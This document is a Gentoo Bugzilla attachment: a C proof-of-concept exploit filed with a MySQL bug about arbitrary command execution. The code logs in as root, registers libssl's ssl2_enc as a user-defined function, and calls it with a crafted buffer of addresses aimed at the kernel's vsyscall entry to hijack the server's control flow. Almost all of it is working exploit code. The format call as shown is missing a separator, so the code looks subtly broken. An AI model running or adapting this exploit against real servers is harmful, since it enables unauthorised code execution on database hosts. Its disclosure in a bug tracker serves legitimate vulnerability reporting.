Gentoo's Bugzilla – Attachment 152431 Details for Bug 220813: dev-db/mysql: arbitrary shell command execution
mysql_udf.c (text/plain), 1.71 KB, created by Robert Buchholz (RETIRED) on 2008-05-08 07:42:14 UTC
/*
 * gcc -Wall -I /usr/include/mysql -L /usr/lib/mysql -lmysqlclient \
 *     -o mysql_udf mysql_udf.c
 *
 * Due to the use of linux-gate, this example will only work on linux.
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <mysql.h>

#define MY_HOST "127.0.0.1"
#define MY_USER "root"
#define MY_PASS ""

int main(void)
{
    MYSQL mysql;
    char sql[1024];
    int len;

    if(!mysql_init(&mysql)) {
        return -1;
    }

    mysql_options(&mysql, MYSQL_SET_CHARSET_NAME, "utf8");

    if(!mysql_real_connect(
        &mysql, MY_HOST, MY_USER, MY_PASS, NULL, 0, NULL, 0)
    ) {
        fprintf(stderr, "%s\n", mysql_error(&mysql));
        exit(EXIT_FAILURE);
    }

    len = snprintf(sql, sizeof(sql),
        "create function ssl2_enc returns integer soname 'libssl.so'"
    );

    if(mysql_real_query(&mysql, sql, len) < 0) {
        fprintf(stderr, "%s\n", mysql_error(&mysql));
        exit(EXIT_FAILURE);
    }

    len = snprintf(sql, sizeof(sql),
        "select ssl2_enc(\""
        "AAAAAAAAAAAAAAAAAAAAAA%c%c%c%cAAAAAAAAAAAAAAAAAAAAAAAAAA"
        "AAAAAAAAAAAAAAAAAAAAAA%c%c%c%cAAAAAAAAAAAAAAAAAAAAAAAAAA"
        "AAAAAAAAAAAAAAAAAAAAAA%c%c%c%cAAAAAAAAAAAAAAAAAAAAAAAAAA"
        0xff, 0xe0, 0xff, 0xff, // any pointer with whatever value is OK.
        0x3c, 0xe0, 0xff, 0xff, // call addr + 0x18
                                // 0xffffe03c + 0x18 -> 0xffffe400 -> __kernel_vsyscall
        0x09, 0xe1, 0xff, 0xff  // addr - 0xac
    );
    mysql_real_query(&mysql, sql, len);

    len = snprintf(sql, sizeof(sql), "drop function ssl2_enc");

    if(mysql_real_query(&mysql, sql, len) < 0) {
        fprintf(stderr, "You just killed the server!\n");
        exit(EXIT_FAILURE);
    }

    printf("It worked!\n");

    exit(EXIT_SUCCESS);
}